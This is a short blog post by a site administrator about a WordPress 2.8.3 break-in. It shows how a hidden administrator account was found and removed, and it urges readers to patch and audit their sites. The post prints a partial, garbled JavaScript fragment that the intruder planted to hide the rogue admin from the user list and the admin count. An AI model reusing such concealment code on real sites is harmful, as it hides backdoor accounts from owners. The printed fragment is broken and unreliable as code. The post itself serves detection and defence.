WordPress Security Concern

I’m not sure if you’ve applied the latest updates for wordpress but I did last week. However, it appears that someone got in to one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3 as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

         for (var i = 0; i < tags.length; i++) {
                        var t=tags[i].innerHTML;
                        var h=tags[i];
                        if(t.indexOf(s)>0){
                                s =(parseInt(t)-1)+s;
                                h.removeChild(h.firstChild);
                                t = document.createTextNode(s);
                                h.appendChild(t);
                        }
                }
                var arr=document.getElementsByTagName("ul");
                for(var i in arr) if(arr[i].className=="subsubsub"){
                        var n=/>Administrator ((d+))                         if(n[1]>0){
                                var txt=arr[i].innerHTML.replace(/>Administrator ((d+))Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);

Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.

-Matt